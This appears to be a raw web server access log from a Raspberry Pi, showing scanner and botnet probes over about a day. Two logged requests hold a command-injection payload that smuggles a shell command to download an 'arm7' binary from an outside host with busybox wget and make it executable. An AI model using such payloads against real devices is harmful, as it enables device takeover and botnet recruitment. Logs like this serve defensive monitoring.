Sun Apr 26 06:25:06 MDT 2020
 06:25:06 up 61 days, 10:53,  1 user,  load average: 0.33, 0.25, 0.26
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 61days  1:19m  2.53s /usr/bin/lxsession -s LXDE-pi -e LXDE
83.97.20.21 - - [26/Apr/2020:12:44:42 +0000] "GET / HTTP/1.0" 200 25000 "" ""
81.196.43.15 - - [26/Apr/2020:12:58:53 +0000] "GET / HTTP/1.1" 400 0 "" ""
187.149.131.186 - - [26/Apr/2020:13:32:18 +0000] "GET / HTTP/1.1" 400 0 "" ""
96.56.160.50 - - [26/Apr/2020:13:44:28 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
96.56.160.50 - - [26/Apr/2020:13:44:28 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
210.186.154.100 - - [26/Apr/2020:13:49:44 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
210.186.154.100 - - [26/Apr/2020:13:49:44 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
192.241.238.174 - - [26/Apr/2020:14:24:43 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
218.149.209.48 - - [26/Apr/2020:15:30:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
176.119.16.31 - - [26/Apr/2020:16:39:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
61.219.11.153 - - [26/Apr/2020:16:52:12 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
93.42.160.188 - - [26/Apr/2020:17:14:09 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
93.42.160.188 - - [26/Apr/2020:17:14:10 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
2.187.11.148 - - [26/Apr/2020:17:15:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
85.114.101.22 - - [26/Apr/2020:17:34:37 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
186.23.252.234 - - [26/Apr/2020:17:42:38 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
186.23.252.234 - - [26/Apr/2020:17:48:46 +0000] "HEAD / HTTP/1.1" 200 0 "" ""
186.23.252.234 - - [26/Apr/2020:17:48:48 +0000] "GET / HTTP/1.1" 200 25000 "" ""
186.23.252.234 - - [26/Apr/2020:17:48:49 +0000] "HEAD /invoker/EJBInvokerServlet HTTP/1.1" 404 0 "" ""
143.255.198.242 - - [26/Apr/2020:17:55:39 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
143.255.198.242 - - [26/Apr/2020:17:55:39 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
46.2.240.152 - - [26/Apr/2020:19:24:57 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
46.2.240.152 - - [26/Apr/2020:19:24:57 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
81.32.252.183 - - [26/Apr/2020:19:33:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
70.89.57.206 - - [26/Apr/2020:19:43:33 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
177.36.246.82 - - [26/Apr/2020:20:14:02 +0000] "GET / HTTP/1.1" 400 0 "" ""
109.111.112.189 - - [26/Apr/2020:20:54:42 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
138.197.161.117 - - [26/Apr/2020:21:19:35 +0000] "GET /index.php HTTP/1.1" 404 0 "" ""
2.137.126.235 - - [26/Apr/2020:21:37:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
95.142.227.28 - - [26/Apr/2020:21:58:49 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
145.255.27.104 - - [26/Apr/2020:22:08:18 +0000] "GET / HTTP/1.1" 400 0 "" ""
51.77.124.86 - - [26/Apr/2020:22:45:32 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
128.199.233.68 - - [26/Apr/2020:23:09:03 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
40.114.250.11 - - [26/Apr/2020:23:32:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
40.114.250.11 - - [26/Apr/2020:23:32:35 +0000] "GET /home.asp HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
40.114.250.11 - - [26/Apr/2020:23:32:35 +0000] "GET /login.cgi?uri= HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
40.114.250.11 - - [26/Apr/2020:23:32:35 +0000] "GET /vpn/index.html HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
40.114.250.11 - - [26/Apr/2020:23:32:36 +0000] "GET /cgi-bin/luci HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
40.114.250.11 - - [26/Apr/2020:23:32:36 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
40.114.250.11 - - [26/Apr/2020:23:32:36 +0000] "GET /remote/login?lang=en HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
40.114.250.11 - - [26/Apr/2020:23:32:37 +0000] "GET /index.asp HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
40.114.250.11 - - [26/Apr/2020:23:32:37 +0000] "GET /htmlV/welcomeMain.htm HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
189.151.203.204 - - [27/Apr/2020:00:08:33 +0000] "GET / HTTP/1.1" 400 0 "" ""
81.30.144.119 - - [27/Apr/2020:00:09:25 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
85.114.101.22 - - [27/Apr/2020:00:19:51 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
213.96.16.202 - - [27/Apr/2020:01:08:37 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
213.96.16.202 - - [27/Apr/2020:01:08:37 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
39.106.52.158 - - [27/Apr/2020:01:12:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
178.93.41.153 - - [27/Apr/2020:03:06:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
202.51.229.133 - - [27/Apr/2020:04:03:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
162.250.19.7 - - [27/Apr/2020:04:09:59 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
172.105.89.161 - - [27/Apr/2020:06:16:14 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
89.40.85.35 - - [27/Apr/2020:07:09:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
192.241.239.50 - - [27/Apr/2020:07:43:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
189.173.29.67 - - [27/Apr/2020:07:50:21 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET"
189.173.29.67 - - [27/Apr/2020:07:50:21 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
176.103.215.62 - - [27/Apr/2020:08:10:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
186.4.212.142 - - [27/Apr/2020:08:48:24 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
186.4.212.142 - - [27/Apr/2020:08:48:25 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
85.163.30.6 - - [27/Apr/2020:10:01:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
139.162.106.181 - - [27/Apr/2020:11:34:20 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)"
45.234.222.48 - - [27/Apr/2020:11:45:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
109.200.130.234 - - [27/Apr/2020:11:50:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
Mon Apr 27 06:25:29 MDT 2020
 06:25:31 up 62 days, 10:54,  1 user,  load average: 2.06, 0.66, 0.39
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 62days  1:20m  2.53s /usr/bin/lxsession -s LXDE-pi -e LXDE